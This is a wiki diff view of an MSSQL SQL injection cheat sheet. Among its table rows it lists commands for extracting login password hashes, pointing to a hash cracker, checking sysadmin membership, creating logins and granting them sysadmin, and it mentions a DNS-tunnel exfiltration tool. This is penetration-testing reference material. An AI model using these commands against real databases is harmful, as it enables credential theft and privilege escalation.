Wiki

User Tools

Site Tools

Trace: find_what_process_is_holding_a_file_open array_of_objects_using_new_operator override_all_other_styles_by_using_important remove_all_packages_in_a_group identifying_if_c_code_is_for_windows_or_linux class_template_-_array_template perform_a_tcp_null_scan_to_fool_a_firewall find_and_delete_files_after_a_certain_time active_directory_user_management
hacking:sql_injection_cheat_sheet_mssql

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Next revision		Previous revision
hacking:sql_injection_cheat_sheet_mssql [2020/04/01 09:29] – created peterhacking:sql_injection_cheat_sheet_mssql [2020/07/15 09:30] (current) – external edit 127.0.0.1
Line 18: Line 18:
 SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins -- priv, mssql 2005 SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins -- priv, mssql 2005
 </code>| </code>|
-|Password Cracker|MSSQL 2000 and 2005 Hashes are both SHA1-based. [https://labs.portcullis.co.uk/application/phrasen-drescher/|phrasen|drescher] can crack these.|+|Password Cracker|MSSQL 2000 and 2005 Hashes are both SHA1-based. [[https://labs.portcullis.co.uk/application/phrasen-drescher/|phrasen|drescher]] can crack these.|
 |List Privileges|Impossible?| |List Privileges|Impossible?|
 |List DBA Accounts|<code> |List DBA Accounts|<code>
 TODO TODO
-SELECT is_srvrolemember('sysadmin'); -- is your account a sysadmin? returns 1 for true, 0 for false, NULL for invalid role. Also try 'bulkadmin', 'systemadmin' and other values from the [https://msdn.microsoft.com/en-us/library/ms176015.aspx|documentation] SELECT is_srvrolemember('sysadmin', 'sa'); -- is sa a sysadmin? return 1 for true, 0 for false, NULL for invalid role/username.+SELECT is_srvrolemember('sysadmin'); -- is your account a sysadmin? returns 1 for true, 0 for false, NULL for invalid role. 
 +Also try 'bulkadmin', 'systemadmin' and other values from the [[https://msdn.microsoft.com/en-us/library/ms176015.aspx|documentation]
 +SELECT is_srvrolemember('sysadmin', 'sa'); -- is sa a sysadmin? return 1 for true, 0 for false, NULL for invalid role/username.
 </code>| </code>|
 |Current Database|SELECT DB_NAME()| |Current Database|SELECT DB_NAME()|
Line 49: Line 51:
 </code>| </code>|
 |ASCII Value -> Char|SELECT char(0x41) -- returns A| |ASCII Value -> Char|SELECT char(0x41) -- returns A|
-|Char -> ASCII Value|SELECT ascii('A') - returns 65|+|Char -> ASCII Value|SELECT ascii('A'-- returns 65|
 |Casting|<code> |Casting|<code>
 SELECT CAST('1' as int); SELECT CAST('1' as int);
Line 65: Line 67:
  
 -- NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary. -- NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary.
--- Also check out theDNS tunnel feature of sqlninja+-- Also check out theDNS tunnel feature of [[http://sqlninja.sourceforge.net/sqlninja-howto.html|sqlninja]]
 </code>| </code>|
 |Command Execution|<code> |Command Execution|<code>
Line 82: Line 84:
 </code> </code>
 |Hostname, IP Address|SELECT HOST_NAME()| |Hostname, IP Address|SELECT HOST_NAME()|
-|Create Users|EXEC sp_addlogin 'user', 'pass'; -- priv| +|Create Users|EXEC [[http://msdn2.microsoft.com/en-us/library/ms173768.aspx|sp_addlogin]] 'user', 'pass'; -- priv| 
-|Drop Users|EXEC sp_droplogin 'user'; -- priv| +|Drop Users|EXEC [[http://msdn2.microsoft.com/en-us/library/ms189767.aspx|sp_droplogin]] 'user'; -- priv| 
-|Make User DBA|EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; -- priv|+|Make User DBA|EXEC [[http://msdn2.microsoft.com/en-us/library/ms186320.aspx|master.dbo.sp_addsrvrolemember]] 'user', 'sysadmin; -- priv|
 |Location of DB files|TODO| |Location of DB files|TODO|
 |Default/System Databases|<code> |Default/System Databases|<code>
Line 93: Line 95:
 tempdb tempdb
 </code>| </code>|
 +
 +----
 +
 +===== References =====
 +
 +https://www.michaelboman.org/books/sql-injection-cheat-sheet-mssql
  
hacking/sql_injection_cheat_sheet_mssql.1585733353.txt.gz · Last modified: 2020/07/15 09:30 (external edit)
Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki